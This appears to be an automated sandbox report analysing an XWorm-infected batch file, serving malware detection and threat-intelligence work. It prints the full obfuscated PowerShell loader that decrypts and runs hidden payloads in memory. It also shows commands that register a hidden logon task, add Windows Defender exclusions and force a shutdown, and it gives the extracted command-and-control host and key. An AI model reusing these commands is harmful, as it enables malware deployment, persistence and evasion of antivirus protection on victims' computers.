Analysis
max time kernel: 347s
max time network: 349s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 24-01-2025 14:44
Static task
static1
General
Target: WizCldient.bat
Size: 262KB
MD5: 1298934b3f4c37d349794f0686c6e7a8
SHA1: 9a6848b79ba8aba796514526898b4c9217301bc0
SHA256: 2bc671246bf742ed639bb5fafa2fcfae1f821500d21971c7a368eba3478b62a0
SHA512: ee7afbdd2cc0297cd0da983618fa45e7c0304c142723f394a8a3d484d6f87e36a902f6dc4788007cd8df5252a455d697eeb21eb1673f41f9464a3d1872179374
SSDEEP: 6144:lyFq/jSEnae2y5lSdU0NeUmerUzCO6jZFwkjAZ9:lyFqbSOaeUxeCOibw+AZ9
Malware Config
Extracted
xworm
IDKTOBEHONESTNIGAS-56344.portmap.io:56344
RRwG35fodUbwRp96
Signatures
Detect Xworm Payload 1 IoCs
resource | yara_rule
behavioral1/memory/3160-51-0x000001622EE30000-0x000001622EE40000-memory.dmp | family_xworm
Xworm family
-
Blocklisted process makes network request 64 IoCs
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid | Process
2100 | powershell.exe
4144 | powershell.exe
3160 | powershell.exe
3472 | powershell.exe
1312 | powershell.exe
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation | WScript.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
16 | ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | powershell.exe
Enumerates system info in registry 2 TTPs 4 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate | powershell.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | powershell.exe
Modifies data under HKEY_USERS 15 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "162" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Modifies registry class 1 IoCs
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000_Classes\Local Settings | powershell.exe
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid | Process
2100 | powershell.exe
2100 | powershell.exe
4144 | powershell.exe
4144 | powershell.exe
3160 | powershell.exe
3160 | powershell.exe
3472 | powershell.exe
3472 | powershell.exe
1312 | powershell.exe
1312 | powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of SetWindowsHookEx 1 IoCs
pid | Process
3948 | LogonUI.exe
Suspicious use of WriteProcessMemory 16 IoCs
description | pid | Process | procid_target
PID 3088 wrote to memory of 2100 | 3088 | cmd.exe | 84
PID 3088 wrote to memory of 2100 | 3088 | cmd.exe | 84
PID 2100 wrote to memory of 4144 | 2100 | powershell.exe | 85
PID 2100 wrote to memory of 4144 | 2100 | powershell.exe | 85
PID 2100 wrote to memory of 3648 | 2100 | powershell.exe | 88
PID 2100 wrote to memory of 3648 | 2100 | powershell.exe | 88
PID 3648 wrote to memory of 3872 | 3648 | WScript.exe | 89
PID 3648 wrote to memory of 3872 | 3648 | WScript.exe | 89
PID 3872 wrote to memory of 3160 | 3872 | cmd.exe | 92
PID 3872 wrote to memory of 3160 | 3872 | cmd.exe | 92
PID 3160 wrote to memory of 3472 | 3160 | powershell.exe | 96
PID 3160 wrote to memory of 3472 | 3160 | powershell.exe | 96
PID 3160 wrote to memory of 1312 | 3160 | powershell.exe | 98
PID 3160 wrote to memory of 1312 | 3160 | powershell.exe | 98
PID 3160 wrote to memory of 964 | 3160 | powershell.exe | 115
PID 3160 wrote to memory of 964 | 3160 | powershell.exe | 115
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
PID 3088: C:\Windows\system32\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\WizCldient.bat"
  - Suspicious use of WriteProcessMemory
  PID 2100: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\WizCldient.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\WizCldient.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID 4144: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_817_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_817.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    PID 3648: C:\Windows\System32\WScript.exe
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_817.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory
      PID 3872: C:\Windows\system32\cmd.exe
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_817.bat" "
        - Suspicious use of WriteProcessMemory
        PID 3160: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('26XlvjUE5165AqEPeVe5DvD1fwVLlGClxE1+Dt9XjP0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sfNDJdxmVNackDmrxAQ8EQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vXSyZ=New-Object System.IO.MemoryStream(,$param_var); $HPfSM=New-Object System.IO.MemoryStream; $VaLYr=New-Object System.IO.Compression.GZipStream($vXSyZ, [IO.Compression.CompressionMode]::Decompress); $VaLYr.CopyTo($HPfSM); $VaLYr.Dispose(); $vXSyZ.Dispose(); $HPfSM.Dispose(); $HPfSM.ToArray();}function execute_function($param_var,$param2_var){ $ZjffX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $QLaJM=$ZjffX.EntryPoint; $QLaJM.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_817.bat';$jsdwy=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_817.bat').Split([Environment]::NewLine);foreach ($wiEcG in $jsdwy) { if ($wiEcG.StartsWith(':: ')) { $POWxE=$wiEcG.Substring(3); break; }}$payloads_var=[string[]]$POWxE.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
          - Blocklisted process makes network request
          - Command and Scripting Interpreter: PowerShell
          - Checks processor information in registry
          - Enumerates system info in registry
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory
          PID 3472: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          PID 1312: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
            - Command and Scripting Interpreter: PowerShell
            - Suspicious behavior: EnumeratesProcesses
          PID 964: C:\Windows\SYSTEM32\shutdown.exe
            Command line: shutdown.exe /f /s /t 0
PID 3948: C:\Windows\system32\LogonUI.exe
  Command line: "LogonUI.exe" /flags:0x4 /state0:0xa38d5055 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Enterprise v15
Downloads